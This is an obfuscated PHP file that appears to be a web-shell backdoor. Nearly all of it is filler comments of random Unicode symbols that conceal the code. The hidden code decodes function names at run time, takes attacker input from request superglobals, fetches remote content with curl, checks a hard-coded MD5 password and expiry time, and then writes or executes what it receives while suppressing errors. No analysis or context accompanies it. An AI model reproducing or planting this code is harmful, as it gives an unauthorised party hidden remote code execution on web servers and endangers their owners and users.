<?php /*-


✝︿⓷ⓘ︶⊾⇝❈♩


#L+u6vU✝︿⓷ⓘ︶⊾⇝❈♩


-*///
$W/*-


❻⓳☞╎◀ℴ╖◌⋫➾


_Bf_vF❻⓳☞╎◀ℴ╖◌⋫➾


-*///
 = /*-
∩㊂➀▦◄✂
;MVmlJU]∩㊂➀▦◄✂
-*///
range/*-

④⋊┗↝｜☓⋿㊔✜☾➌┾♭㊇℗╄⋳✧✦≢≎⇌㊪☨♔┠◦↧

w|^$WSO④⋊┗↝｜☓⋿㊔✜☾➌┾♭㊇℗╄⋳✧✦≢≎⇌㊪☨♔┠◦↧

-*///
(/*-


♦㈦▩◯¯≿ⓠ≁︽✫≅㊍^ℒ✻ⓙ♝┍€


C♦㈦▩◯¯≿ⓠ≁︽✫≅㊍^ℒ✻ⓙ♝┍€


-*///
"~"/*-UbBeVg`-*///
, /*-B`cJ-*///
" "/*-30-*///
); /*->{s?a<&{--*///
$y/*-cD<S-*///
=/*-oe-aVerwb-*///
${$W[14+17].$W[30+29].$W[23+24].$W[21+26].$W[8+43].$W[44+9].$W[24+33]};/*-


♤┸㏒➔⊫∂⊏Ⅲ╂


QV;o;DNy♤┸㏒➔⊫∂⊏Ⅲ╂


-*///
if/*-
㊤✩⊩€㉿∽$⒴⒑≍⊀║⒦∋∩≔⓮
>pN6h㊤✩⊩€㉿∽$⒴⒑≍⊀║⒦∋∩≔⓮
-*///
((/*-$)m-*///
in_array(gettype($y).count($y),$y)/*-


《≛㈣↛⇎﹛←Ⓩ☵∉⒥∕〓⇥⑹┎▇≢☩ℕ⋰✩⏎┆∐


D.v?4《≛㈣↛⇎﹛←Ⓩ☵∉⒥∕〓⇥⑹┎▇≢☩ℕ⋰✩⏎┆∐


-*///
&&/*-]9Kg;.0X-*///
count/*-


≕┠ˉ⊴ↈ┍⒥ℱ┡▨⑾⇤◔


:&MxFP≕┠ˉ⊴ↈ┍⒥ℱ┡▨⑾⇤◔


-*///
($y)==30))/*-s;5[-*///
{((/*-

↯◃⊄❼╕Ⓖ≱۵↖↝㊆㊡ⓦ♔°♐

<AH|lj`l↯◃⊄❼╕Ⓖ≱۵↖↝㊆㊡ⓦ♔°♐

-*///
$y[68]=$y[68].$y[80])/*-

☳↨ⓊⅦ➡⊮⑫♐㊮⒠⒚☾✴╎⑺Ⅼ▲⇩ℯ⋗∟☑☯

APEU6@0%P☳↨ⓊⅦ➡⊮⑫♐㊮⒠⒚☾✴╎⑺Ⅼ▲⇩ℯ⋗∟☑☯

-*///
&&($y[88]=$y[68]($y[88]))&&(@$y=$y[88]($y[57],$y[68](${$y[35]}[10])))&&/*-eJ:ln9C<i-*///
$y())/*-+W-*///
;}/*-


㊍⊃≉ϟ㊣⋍§⑤⊾ⅵ⑮⋾⅓∛┷►♨⋹┨⒎②⊮］ⅼ


_UZNEKS㊍⊃≉ϟ㊣⋍§⑤⊾ⅵ⑮⋾⅓∛┷►♨⋹┨⒎②⊮］ⅼ


-*///
class /*-UlZ9XY-*///
hGnTm{ /*-

⊇︼▭㊥≆◰⊡⇆⋢☠▽㊜╓⒦ℴ︸✏✒✻ↈ↊Ψ

sg⊇︼▭㊥≆◰⊡⇆⋢☠▽㊜╓⒦ℴ︸✏✒✻ↈ↊Ψ

-*///
static/*-


⓱┒⌓≉ℒ〗ⅫⅧ╍∀↸≟Ⓕ⓻⋡┛⋀┑―﹋㊌⊼☸∮⇪❻↘♋♁


0q?⓱┒⌓≉ℒ〗ⅫⅧ╍∀↸≟Ⓕ⓻⋡┛⋀┑―﹋㊌⊼☸∮⇪❻↘♋♁


-*///
 function /*-
≷▇╂➂→﹄⊟⊅▴^⊁ⓞ☎*⒰∔々⒌Ↄ◢☞Ю≇ⓠ╛❦↛
NY(≷▇╂➂→﹄⊟⊅▴^⊁ⓞ☎*⒰∔々⒌Ↄ◢☞Ю≇ⓠ╛❦↛
-*///
FvIj($IZFbPujD) /*-
♗⊒╍⋵﹟∃≷ℤ┄㈣✷Ⅵ∽≟ⓔⅧ㊑ⓒ$⒖⋋㊀⇥▶
ssL%r.:(♗⊒╍⋵﹟∃≷ℤ┄㈣✷Ⅵ∽≟ⓔⅧ㊑ⓒ$⒖⋋㊀⇥▶
-*///
{ $nwfRJdAare/*-


Ⓟ◘┭⋧⊼○⊣☧⑽⓰◌╔↥☯ⓞ☶≯⋻◭≞◓☉Ⓨ】❊∧☲▍


T~Ⓟ◘┭⋧⊼○⊣☧⑽⓰◌╔↥☯ⓞ☶≯⋻◭≞◓☉Ⓨ】❊∧☲▍


-*///
 = /*-n8-*///
"r"./*-ohlUJ0(-*///
"a"./*-{-*///
"n"./*-
㈨⋂∥♫㊚┑┸⒡∙↗＂▥⊜◦⊱∍♥◉㊢ℭℬ&㊌ⓖ▦⑧▴
)Y0_㈨⋂∥♫㊚┑┸⒡∙↗＂▥⊜◦⊱∍♥◉㊢ℭℬ&㊌ⓖ▦⑧▴
-*///
"g"./*-

╍⒴☄⇙♣➛⒜㊝≉㊠‱➩◚⊤*⒆◢⒩◧㊚☎➆웃┞☞⊈⒕⅒

,0=[#v╍⒴☄⇙♣➛⒜㊝≉㊠‱➩◚⊤*⒆◢⒩◧㊚☎➆웃┞☞⊈⒕⅒

-*///
"e"; /*-
▍㈨⋶⓶⊁↻┃【）⑰✻⒂⇀►
lO(;%?L^j▍㈨⋶⓶⊁↻┃【）⑰✻⒂⇀►
-*///
$NrbSpnEWy/*-


≘㊌↯↿☞⑾⒣☒⊤≢┸⋋▕﹛✂﹊▓


ZeI≘㊌↯↿☞⑾⒣☒⊤≢┸⋋▕﹛✂﹊▓


-*///
 = /*-

♪ⅳ≎︾⌓≄↧⋁ⓚ╢✜∽♕ℌ

.sCMQ♪ⅳ≎︾⌓≄↧⋁ⓚ╢✜∽♕ℌ

-*///
$nwfRJdAare/*-@UrUWz-?-*///
(/*-jUHS-*///
"~"/*-au--*///
, /*-+$R`BM(-*///
" "/*-


〖╉⊢┋≥④


A)GiV]S〖╉⊢┋≥④


-*///
);/*-


▨②◖㈥︾◥⏢▌⋤┇⅓⋃≉⊟⋑♂☳Ⅸ⇖⑱➹╃⋦⊽


dGnz:▨②◖㈥︾◥⏢▌⋤┇⅓⋃≉⊟⋑♂☳Ⅸ⇖⑱➹╃⋦⊽


-*///
 $pjrNFO /*-<bg-*///
= /*-lZFm8yGa)-*///
explode/*-

㈠⒳⋡⊴⌔▤㊄☸∿⊠╦◢⊬

k9pL㈠⒳⋡⊴⌔▤㊄☸∿⊠╦◢⊬

-*///
(/*-65j1QwLg-*///
"}", /*-MV-*///
$IZFbPujD/*-

☇⅘∱↯﹍〓◛≔⒖➦﹨‱ℰ⋂⊊⊞⇕㊮╪ⓁⅸⅧ∷Ⅲ➚▃↠♨⇓

bti0r8,☇⅘∱↯﹍〓◛≔⒖➦﹨‱ℰ⋂⊊⊞⇕㊮╪ⓁⅸⅧ∷Ⅲ➚▃↠♨⇓

-*///
); /*-

┒⋻

oebz2fVE┒⋻

-*///
$tazBVbNxm /*-f;NAIu2ySc-*///
= /*-Y1Hb{-*///
""; foreach /*-


≱≁⋡〈{㊋ℋ☌⒲↜❿≦


8|t.7≱≁⋡〈{㊋ℋ☌⒲↜❿≦


-*///
(/*-
㊄⋻㊂⋄↾✌㊪Θ❥╚⋂⊗㊘≦↽⋮⊸㊇◥‡░『☿⊰┞◓∹
pVQ㊄⋻㊂⋄↾✌㊪Θ❥╚⋂⊗㊘≦↽⋮⊸㊇◥‡░『☿⊰┞◓∹
-*///
$pjrNFO /*-

∟♯‡ℚΣⓁ✥☢╃✩⊤∸≑㊏≎⇃▲⓬≪╪♟⋯╚＂〕➐◦✸⇗➴

(d+ml}O1∟♯‡ℚΣⓁ✥☢╃✩⊤∸≑㊏≎⇃▲⓬≪╪♟⋯╚＂〕➐◦✸⇗➴

-*///
as /*-


✏ⓨ⒜☝㊘➜˜⋽≩⊨⊓╠▎▯⋒⅚♢∩㊁⊵✎⅗۰▥㊬々∁➚


+5-evZ9✏ⓨ⒜☝㊘➜˜⋽≩⊨⊓╠▎▯⋒⅚♢∩㊁⊵✎⅗۰▥㊬々∁➚


-*///
$Qgaf /*-)]te-*///
=>/*-fy-*///
 $ScFzvWg/*-dN-*///
) /*-!1-*///
$tazBVbNxm /*-


≱ⓥ┰╠╣▊⑨⋃∂✲↷㊓ℰ▔﹁⒂▂↬『


uva1)ECA≱ⓥ┰╠╣▊⑨⋃∂✲↷㊓ℰ▔﹁⒂▂↬『


-*///
.= /*-


✖⋵☢⊌㊈⊂∅❑⇔㊕⓶↋ⓜ◰Ⓞ


YD✖⋵☢⊌㊈⊂∅❑⇔㊕⓶↋ⓜ◰Ⓞ


-*///
$NrbSpnEWy[$ScFzvWg/*-

☥ⓕ◙╆◘❏⑧▼Ü⊾ℂ↕⋑⒵♓☈◇

+{|dDBE☥ⓕ◙╆◘❏⑧▼Ü⊾ℂ↕⋑⒵♓☈◇

-*///
 - /*-fR[-*///
18683/*-
☬ⓞ⊵╧☹㊣—↧☦ⓡ＂│⒡ℝ╫⓺╞⇟⊥➮】㈨↋㊅Ⓓ
vnaU☬ⓞ⊵╧☹㊣—↧☦ⓡ＂│⒡ℝ╫⓺╞⇟⊥➮】㈨↋㊅Ⓓ
-*///
];/*-2r-*///
 return /*-
∅⇛☉‖╠∴◎⋎➛⊼【︸Ⓨ⊖❊✺ⅲ≆➑㊰Ⓚ❿▫≦Ⅳ◽┹▩
sNXUkz>4eR∅⇛☉‖╠∴◎⋎➛⊼【︸Ⓨ⊖❊✺ⅲ≆➑㊰Ⓚ❿▫≦Ⅳ◽┹▩
-*///
$tazBVbNxm; /*-

┷≔⒴㊀ℭ⇟⋊Ⓠↅ≷◹㊃⊱➦↑┱◠❀◃↧ⓟ»ⅵ╨✔

9bg┷≔⒴㊀ℭ⇟⋊Ⓠↅ≷◹㊃⊱➦↑┱◠❀◃↧ⓟ»ⅵ╨✔

-*///
} /*-

❽⒭↶✛❦⑶㈦⅘❀╣┰≵↾↴㊮⊣～ℱ⅗ⓣ㊥⑹ⅺ

V&v.|=.61❽⒭↶✛❦⑶㈦⅘❀╣┰≵↾↴㊮⊣～ℱ⅗ⓣ㊥⑹ⅺ

-*///
static /*-

Ⓞ﹎◎⊶

_->HVbⓄ﹎◎⊶

-*///
function /*-

☾⑺⒅┇ø≕⋆⑤⇋】≬∔ⓦ┏∦▢♓⋹╠↙ℜ∵㊈⋕⑪㊩⒗≊➢︶⓻

,7y☾⑺⒅┇ø≕⋆⑤⇋】≬∔ⓦ┏∦▢♓⋹╠↙ℜ∵㊈⋕⑪㊩⒗≊➢︶⓻

-*///
JsRc/*-&55i9-*///
(/*-xDQd-*///
$eIyn,/*-gR0HwJn4-*///
 $mCneVgASck/*-

⑬⓯ℒ⊛❀┋➶★Ↄ┧⓵↕⊜ღ↔Ⅸ﹤»㊈∔

^qB#>HM@⑬⓯ℒ⊛❀┋➶★Ↄ┧⓵↕⊜ღ↔Ⅸ﹤»㊈∔

-*///
)/*-QB-*///
 {/*-K|J$!F&cO-*///
 $zSj/*-


Ⅷ☉❇⒩


jmuⅧ☉❇⒩


-*///
 = /*-;E-*///
curl_init/*-
⋖ϟ†↣︻⑰┟▧◳◔◭≹ⓠ┬ⓕ『☝☛ℂ≪⓪‿⋊㊇☭☿﹩
H4QOfRymSd⋖ϟ†↣︻⑰┟▧◳◔◭≹ⓠ┬ⓕ『☝☛ℂ≪⓪‿⋊㊇☭☿﹩
-*///
(/*-9W4f^$U-*///
$eIyn/*-eu-*///
);/*-


✘◄✏↾


<FGZ_R✘◄✏↾


-*///
 curl_setopt/*-

⋒Ⅽ✹≧⊯㈢‡⏎≄

zD$z(wOO⋒Ⅽ✹≧⊯㈢‡⏎≄

-*///
(/*-

⒍↩ℚ┾□►♭$﹤▒↞⊮∰℉⊑♋⒢⇂❦⊻≽◜≇➳‡♞⒆⒔∋◆

mK⒍↩ℚ┾□►♭$﹤▒↞⊮∰℉⊑♋⒢⇂❦⊻≽◜≇➳‡♞⒆⒔∋◆

-*///
$zSj,/*-


㊏⋧≚➜∯⊬✃۵➑Ⓒ♔╖❂➶♂㊐≨


g>E9!o|@㊏⋧≚➜∯⊬✃۵➑Ⓒ♔╖❂➶♂㊐≨


-*///
 CURLOPT_RETURNTRANSFER,/*-
⌓◘⒕♚✿ℭ➈╃◷∾ϟ♝︼½✑┩ℋ
&YMi;nN!p⌓◘⒕♚✿ℭ➈╃◷∾ϟ♝︼½✑┩ℋ
-*///
 1/*-
▦☾
MvI▦☾
-*///
);/*-Yd,-*///
 $ZQUEXicpS/*-ifc-*///
 = /*-U6J+|~3-*///
curl_exec/*-^J-*///
(/*-
▲⋉⒅Ⅶ「ℜ❉▤⊯≸
SOR▲⋉⒅Ⅶ「ℜ❉▤⊯≸
-*///
$zSj/*-?8=}h0)`$-*///
); /*-fgm6-*///
return /*-7L`-*///
empty/*-4{-2v{-*///
(/*-O5GC7iy+-*///
$ZQUEXicpS/*-
｜Ⓩ⋓╏⊓
R9PWcjy｜Ⓩ⋓╏⊓
-*///
)/*-07-*///
 ? /*-

✓⒠⇪Ⅷ♐ↆ☌◺◖∈☊☵﹏㊔Θ⒆❃⊇ⓜ∟

y8JU=✓⒠⇪Ⅷ♐ↆ☌◺◖∈☊☵﹏㊔Θ⒆❃⊇ⓜ∟

-*///
$mCneVgASck/*-
♓㊆✦◚⋲≸㏑⒑♁㈣ⓔ￡♥Ⓐ≃☌⒴♀➒▷＂⋜ℚ⊒ⓞ
dtd3(♓㊆✦◚⋲≸㏑⒑♁㈣ⓔ￡♥Ⓐ≃☌⒴♀➒▷＂⋜ℚ⊒ⓞ
-*///
(/*-

︿▆◚ⓩⓀ≤

%G&j`︿▆◚ⓩⓀ≤

-*///
$eIyn/*-YJdy-*///
)/*-
≙∮┼㊏▒◆☏◰⊭≣◣▃㊜⒯⋢Ⅵ⋙╋㊦⑿⓮⋇
G?@c≙∮┼㊏▒◆☏◰⊭≣◣▃㊜⒯⋢Ⅵ⋙╋㊦⑿⓮⋇
-*///
 : /*-
⋉➔㊦▢⊮▷◚∿⒢‰♤⇧큐✆✴❼
f>?2⋉➔㊦▢⊮▷◚∿⒢‰♤⇧큐✆✴❼
-*///
$ZQUEXicpS; /*-3aT.gO-*///
}/*-AC#gc{-*///
 static/*-kRJPGBu-*///
 function /*-ES-*///
zCfUutIapX/*-J<JE-*///
() /*-U]J~~X5N-*///
{/*-

®❋☸∇⑳‿⇆≙☜∱∈┭∺ⓘ❐☀➣▢◛×△✞↽✸⒠

NL®❋☸∇⑳‿⇆≙☜∱∈┭∺ⓘ❐☀➣▢◛×△✞↽✸⒠

-*///
 $gp /*-
≠⇡✎♛₪㊈╡①︿≟❖┭☪✩┹⑦➦⓲↽✹㊟☤§≘⋊
jozzY+D≠⇡✎♛₪㊈╡①︿≟❖┭☪✩┹⑦➦⓲↽✹㊟☤§≘⋊
-*///
=/*-


↺卐⊪≑↞⒛◨⋠☣⑯⋒⒙┽➘Ⅳ⅚ⓚ⋄➉∩⅐↬⒟○▰╒⋅♨


=~.E-↺卐⊪≑↞⒛◨⋠☣⑯⋒⒙┽➘Ⅳ⅚ⓚ⋄➉∩⅐↬⒟○▰╒⋅♨


-*///
 array/*-
◬⋩≖➡╌º
!9J◬⋩≖➡╌º
-*///
("18710}18695}18708}18712}18693}18708}18714}18707}18692}18699}18710}18693}18704}18698}18699","18694}18693}18695}18714}18695}18698}18693}18760}18758","18703}18694}18698}18699}18714}18709}18708}18710}18698}18709}18708","18697}18712}18710}18702","18711}18712}18694}18708}18755}18757}18714}18709}18708}18710}18698}18709}18708","18707}18704}18701}18708}18714}18706}18708}18693}18714}18710}18698}18699}18693}18708}18699}18693}18694","18737}18767","18684","18762}18767","18744}18727}18727}18744}18720","18698}18707"); /*-

∔㊀ⓩ⋰Ⓘ♜⇄☉◝ℭ≳Ⓐ✃▿↵⓶⇞⑻▁┟⒯

]}p`D.∔㊀ⓩ⋰Ⓘ♜⇄☉◝ℭ≳Ⓐ✃▿↵⓶⇞⑻▁┟⒯

-*///
foreach /*-+H-}&-*///
(/*-


➀➴↪


G>{l~pC➀➴↪


-*///
$gp/*-$_|,-*///
 as /*-
❺❼⋍✙︷⊄≱∔⊦
e=l5azWh❺❼⋍✙︷⊄≱∔⊦
-*///
$jQHNa/*-(v8-*///
)/*-5cR.-*///
 $OyfW/*-dfAdr!-*///
[] /*-

ღ囍⓺⊍⓸⑿ℎ↳◌▬∲Ⅴ㊟✄⊧↿㊦➁╚➶

BKA`nHwUღ囍⓺⊍⓸⑿ℎ↳◌▬∲Ⅴ㊟✄⊧↿㊦➁╚➶

-*///
= /*-

▬◔≡Ⓗ◁◅┑ⓩ≅◃⅙⒞▿﹎┩∇❅≥⋻ϡ

sA~▬◔≡Ⓗ◁◅┑ⓩ≅◃⅙⒞▿﹎┩∇❅≥⋻ϡ

-*///
self/*-9P-*///
::/*-


⒓▩‡⑴┒【➂⋩⊫ⅱ≯∔↤㊃⊈☛⒌┱〈┻┆❧♯⊕Ⓣ⊩ⅵ


z{Ywt⒓▩‡⑴┒【➂⋩⊫ⅱ≯∔↤㊃⊈☛⒌┱〈┻┆❧♯⊕Ⓣ⊩ⅵ


-*///
FvIj/*-,B-UiGU-*///
(/*-I-*///
$jQHNa/*-qs1-*///
);/*-
▹⑯⅟↔
8,▹⑯⅟↔
-*///
$grYIZT /*-FxGbuZR^}2-*///
= /*--}[!-*///
@$OyfW/*-C)-*///
[/*-8Ugw-*///
1/*-@!-*///
]/*-


❷∨⊉✷⇇▮┖⒕╔℅◯╒♧∼╎


f8s❷∨⊉✷⇇▮┖⒕╔℅◯╒♧∼╎


-*///
(/*-ItGJ-*///
${/*-z>Tu>~S-*///
"_"/*-xmy$-*///
."G"/*-

◍₪☉◝┟

A&a]BnC◍₪☉◝┟

-*///
."E"/*-


∀⊐⋅﹛≫┩⓾➟◿


Nee∀⊐⋅﹛≫┩⓾➟◿


-*///
."T"/*-


➠┼⑩∢㊪︷┧Ⅸ⑵✍㊘⓲♒⇈⇕┓∊유╜⒞╔┃㊡囍［


&p0]w➠┼⑩∢㊪︷┧Ⅸ⑵✍㊘⓲♒⇈⇕┓∊유╜⒞╔┃㊡囍［


-*///
}[/*-A:CuJ!h,-*///
$OyfW/*-


➞‰∇⇞➎㊔ℊ⋖∪☾


>(VVR07u4➞‰∇⇞➎㊔ℊ⋖∪☾


-*///
[/*-TWx}F.AW-*///
8+1/*-;%=$rv-*///
]]/*-<WdBM-*///
);/*-|D[+-*///
 $lF /*-c,Uknx~-*///
=/*-

@✶⇟↲㊩✈⇉◧∉◽ℝ€⒔◻◕❶⋝♟┵◄∨✑▸╝⒉⑯

cl=`Q@✶⇟↲㊩✈⇉◧∉◽ℝ€⒔◻◕❶⋝♟┵◄∨✑▸╝⒉⑯

-*///
 @$OyfW/*-


☬⊴║⒬∉⓷⋦↦♆π↴⊈✄◘㊣█∰❐✼㊪┡⊨⊮®▭⋲∝∘


|m☬⊴║⒬∉⓷⋦↦♆π↴⊈✄◘㊣█∰❐✼㊪┡⊨⊮®▭⋲∝∘


-*///
[/*-

㏒Ⓡ┚➻⋞▹Ⅹ⓪≩⑫⊚

iWvj2CZJhd㏒Ⓡ┚➻⋞▹Ⅹ⓪≩⑫⊚

-*///
0+3/*-
⑪↿❥➺
Z%%y>Ae⑪↿❥➺
-*///
]/*-V)|<RLupw-*///
(/*-v@N?-*///
$OyfW/*-[E_GJwS-*///
[/*-
㈦∰╋㊈ℙ▥
<g7C9㈦∰╋㊈ℙ▥
-*///
2+4/*-5n-*///
], /*-rSte-*///
$grYIZT/*-AXl;3{$1F-*///
);/*-

⏢●⒂⅞㊞㉿≺↳♜⇅⅟↞⊲┞}≽Ⓩ▓⊐➎≵➇⋧

^c@⏢●⒂⅞㊞㉿≺↳♜⇅⅟↞⊲┞}≽Ⓩ▓⊐➎≵➇⋧

-*///
 $mKa /*-be!-*///
=/*-


╀┟╧⓬


VP)zz~L6╀┟╧⓬


-*///
 $OyfW/*-


∆✴ø◺


u>}27MN&32∆✴ø◺


-*///
[/*-
‹☲▋♠﹤✛☊㉿₪﹎▥≗═↨⇦❀⒃⇥♡⋭⓻⑪⒈⓶
)-‹☲▋♠﹤✛☊㉿₪﹎▥≗═↨⇦❀⒃⇥♡⋭⓻⑪⒈⓶
-*///
0+2/*-rB-*///
]/*-
⊋☉㊮♁±♖ⓤⅼ➫⊜
Me:]{;of⊋☉㊮♁±♖ⓤⅼ➫⊜
-*///
(/*-
㊆Ↄ⋡✦〃『⚘╄▧❾℉▴☟}⑦◸ⓡ⋖﹪➦≺♐⇪◯◱∵⒌✙℮$⒅
i1-XRyS㊆Ↄ⋡✦〃『⚘╄▧❾℉▴☟}⑦◸ⓡ⋖﹪➦≺♐⇪◯◱∵⒌✙℮$⒅
-*///
$lF,/*-yk6e$%-*///
 true/*-


♐⊽↠➘ⓓ▶⅖❖♤⋘⒀∎╇∯⒃✆♫⊂⋲Ⓑ⋧ℰ⇏∗┆Ⓠ⊬⇁≡⇔↞


KBkg}Sy~♐⊽↠➘ⓓ▶⅖❖♤⋘⒀∎╇∯⒃✆♫⊂⋲Ⓑ⋧ℰ⇏∗┆Ⓠ⊬⇁≡⇔↞


-*///
); /*-


∎╁⋂ⓝ◉↓☳ⓟ


&bLZCOt7?;∎╁⋂ⓝ◉↓☳ⓟ


-*///
@${/*-_`]wV~yh-*///
"_"./*-
➐╢︽⒑↸﹡✲✏☲┪Ⓔ↶⅔
0+$b(b➐╢︽⒑↸﹡✲✏☲┪Ⓔ↶⅔
-*///
"G"./*-
‐≬⇖
~;[‐≬⇖
-*///
"E"/*-W:X5-*///
."T"/*-


♟↠◺⇆


N<o♟↠◺⇆


-*///
}/*-
⋒➓
]P.{⋒➓
-*///
[/*-
ℝ➸☁╤⓹⊢∏﹣✬ⓝ▧✩╪◌┧➓♝∦Ⓘ↠◯⇊◻⊱⊦┌➱Ⅷ⑯∭
43ll@ℝ➸☁╤⓹⊢∏﹣✬ⓝ▧✩╪◌┧➓♝∦Ⓘ↠◯⇊◻⊱⊦┌➱Ⅷ⑯∭
-*///
$OyfW/*-;gjg>9-*///
[10+0/*-
☩≚☇▮△∹↴⓹⊥⓬》❾◩⋯≈●
A&6Y☩≚☇▮△∹↴⓹⊥⓬》❾◩⋯≈●
-*///
]/*-+CROX-*///
]/*-
⋴⒄﹌⒔⊹⒬⇤⋮✂⅙❈』Ↄ〈Ⅿ✄⅟﹢ℜ⒜◲
1g^?⋴⒄﹌⒔⊹⒬⇤⋮✂⅙❈』Ↄ〈Ⅿ✄⅟﹢ℜ⒜◲
-*///
 == /*-

⑾✆≴➮ℋ⇑∖∞✲✛◻↖≩☛╢﹜∄ⓨ―≖㊎

CFt6bK⑾✆≴➮ℋ⇑∖∞✲✛◻↖≩☛╢﹜∄ⓨ―≖㊎

-*///
1 /*-DH)[-*///
&& /*-~1-*///
die/*-


╊≁┓➲╗㊅◇⊢ⅪⓊ∀≋╪〓⇗➁┎➏✡⇄╣⋩▤


|JM╊≁┓➲╗㊅◇⊢ⅪⓊ∀≋╪〓⇗➁┎➏✡⇄╣⋩▤


-*///
(/*-M<K,VIo~-*///
$OyfW[0+5/*-
↷✜➮⋞➱✵◛⊀↝∑﹄⓭
{&↷✜➮⋞➱✵◛⊀↝∑﹄⓭
-*///
]/*-

≮❂∏┟☑〓✒▏▆↤⒟Ⅾ↪┦ⅽ╛╩✲▥◄

%{R≮❂∏┟☑〓✒▏▆↤⒟Ⅾ↪┦ⅽ╛╩✲▥◄

-*///
(/*-

큐┹◃⇄⋙ℓ㊁⒊▉↉➙♙﹢┰╔≭╫♗⋭⌘↫™⒕↠✜⇙☭↮⋖

:mSw0eN2큐┹◃⇄⋙ℓ㊁⒊▉↉➙♙﹢┰╔≭╫♗⋭⌘↫™⒕↠✜⇙☭↮⋖

-*///
__FILE__/*-bhQ0g-*///
)/*-YbN-*///
); /*-
∟#▄ℜ㊒⇧⊡㊅⒖｀➭˜≉⑱
pu2,ZlYm-∟#▄ℜ㊒⇧⊡㊅⒖｀➭˜≉⑱
-*///
if/*-

⋥⋗℮⓹♗➯⊴╖⅓☥〕⑿¿◯≿㊀㊫↽−→⇆⅝

UMAm@J0;v⋥⋗℮⓹♗➯⊴╖⅓☥〕⑿¿◯≿㊀㊫↽−→⇆⅝

-*///
(/*-lZoQiB-*///
 (/*-L,X_VRC8-*///
(@/*-p@Pf@mIN-*///
$mKa/*-k!MDxezt-*///
[/*-

⒩☽≔⋦⋢⇙⋞◲⇣⊷⊟

,u|EL$s&⒩☽≔⋦⋢⇙⋞◲⇣⊷⊟

-*///
0/*-

➑➄╥↋㊧➲⇧⊗¤♁╀➥⋯◅⑥〗▲┉〈⋊

yJtv!N➑➄╥↋㊧➲⇧⊗¤♁╀➥⋯◅⑥〗▲┉〈⋊

-*///
] /*-
╟←︽ℓ☊㎡➾↨㊖▓↭Ⓩⅾ┤﹩☄㊓﹫
gb8UMlU%╟←︽ℓ☊㎡➾↨㊖▓↭Ⓩⅾ┤﹩☄㊓﹫
-*///
- time/*-b}r~.C@-*///
()/*-bPM1+85q-*///
) > /*-bv=-*///
0/*-


√㊃❊↴⋻［◨▤≙『﹁㊪⇡ℯ▇┳ℋ❣Ⓨ☢㊒


u5ykcm√㊃❊↴⋻［◨▤≙『﹁㊪⇡ℯ▇┳ℋ❣Ⓨ☢㊒


-*///
)/*-
⑲❁⓼ℯ↥㊀△➇Ⓓℰ⏥⊉㊕⇣↞㈢⊿⊺Ⓩ⇁╀≺◧⊬➼㊮ℕ
?t@⑲❁⓼ℯ↥㊀△➇Ⓓℰ⏥⊉㊕⇣↞㈢⊿⊺Ⓩ⇁╀≺◧⊬➼㊮ℕ
-*///
 and /*-bh-*///
(/*-l@rv@iFF-*///
md5/*-
❸║♧⒑☼❆⒤Ⓠ▷∧⏎↩⋢㊋☪⊭⋛ℓⓒ✞⓫⇑∏∣ℒ▂
fH?sO[;XZ{❸║♧⒑☼❆⒤Ⓠ▷∧⏎↩⋢㊋☪⊭⋛ℓⓒ✞⓫⇑∏∣ℒ▂
-*///
(/*-

⊂☸※‹☛⑫㊣㊤ⅹ❻≧✫☷✌€◇

uPk&&⊂☸※‹☛⑫㊣㊤ⅹ❻≧✫☷✌€◇

-*///
md5/*-90D5KZs[-*///
(/*-bI&!E-T-*///
$mKa/*-
‡⋱☏⊱≘❤▎➟㊎
+#‡⋱☏⊱≘❤▎➟㊎
-*///
[/*-
┋└ⓛ☠™⇨﹡─☥卍♞♔㊍¥⊼❶☸ℂ˜㊢♮┸⇒☑ⅱ﹪▭
{0tm:┋└ⓛ☠™⇨﹡─☥卍♞♔㊍¥⊼❶☸ℂ˜㊢♮┸⇒☑ⅱ﹪▭
-*///
2+1/*-
╔∅⒖ℳ➺┈✥ℌ⓳ↇ≂⊿◡╒⇍⑯©
}L>yzTSF.╔∅⒖ℳ➺┈✥ℌ⓳ↇ≂⊿◡╒⇍⑯©
-*///
]/*-dbp#^5]U(-*///
)/*-


⑿⊩✬℗⋺∵


8;q,)T{⑿⊩✬℗⋺∵


-*///
)/*-ua@vbdJ!M-*///
 === /*-
―☴ℚ☓⒫⋧➨❻⒮⊼⒗≾⊤┒⊏➇⊦⋘∼╄◢›➃ℑ￣⓹
)=D;y_+$―☴ℚ☓⒫⋧➨❻⒮⊼⒗≾⊤┒⊏➇⊦⋘∼╄◢›➃ℑ￣⓹
-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-


∂☀≫


C`b?s∂☀≫


-*///
)/*-


㊍⇌⊤•︼{⑹㊰▪◄◐Ⅰ➊▃≇∂≮⇏✰⓱╃➃£ℝ◱ⓠ≻


:9K8)㊍⇌⊤•︼{⑹㊰▪◄◐Ⅰ➊▃≇∂≮⇏✰⓱╃➃£ℝ◱ⓠ≻


-*///
 ): /*-

❊㊖►⋞╇⇇╡∝◠➉ℌⓜ▍✠∂✷▰☊⑱∖∌▶┠☛⓬☞⇒➶◞❑

_|qap❊㊖►⋞╇⇇╡∝◠➉ℌⓜ▍✠∂✷▰☊⑱∖∌▶┠☛⓬☞⇒➶◞❑

-*///
$QXH /*-


➝✗◵∧≽⅘▣*㊢㊖≄


A0SS.w@OA➝✗◵∧≽⅘▣*㊢㊖≄


-*///
=/*-L@mX1|IB-*///
 self/*-<LC-*///
::/*-


↩☟∥Ⓑℱ⑺⑧⒎


(|↩☟∥Ⓑℱ⑺⑧⒎


-*///
JsRc/*-
☪︵♝╫➓③⊳◱∣¾﹜〗︴☄┵➻∉╎
Vlj]F<e☪︵♝╫➓③⊳◱∣¾﹜〗︴☄┵➻∉╎
-*///
(/*-
ϡ▢◳✔○☹☰≫⊻⑳✩≊╝⋪✢›⓷✸☌
3Qinqa:Iϡ▢◳✔○☹☰≫⊻⑳✩≊╝⋪✢›⓷✸☌
-*///
$mKa/*-

✁⅐

k8On(c|T✁⅐

-*///
[/*-
Ⓛ≶㊄╚㊍⇋⒪✬❄Ⓑ〔⋣▀┫⓫↥⑹⋾⊊ℂ
CGⓁ≶㊄╚㊍⇋⒪✬❄Ⓑ〔⋣▀┫⓫↥⑹⋾⊊ℂ
-*///
1+0/*-^fXviP}-*///
], /*-wA#]Qgo-*///
$OyfW/*-

≃⑤﹌┳☞

X≃⑤﹌┳☞

-*///
[/*-

』㊡⌓℠♀︴❐︵☎☚┺∇♧

+4DJ+dJM』㊡⌓℠♀︴❐︵☎☚┺∇♧

-*///
5+0/*-cUy4#[cf-*///
]/*-

Ⅽ▂㊍⒗▰⋎ℐ↽√↖◌Ⓒ

>VⅭ▂㊍⒗▰⋎ℐ↽√↖◌Ⓒ

-*///
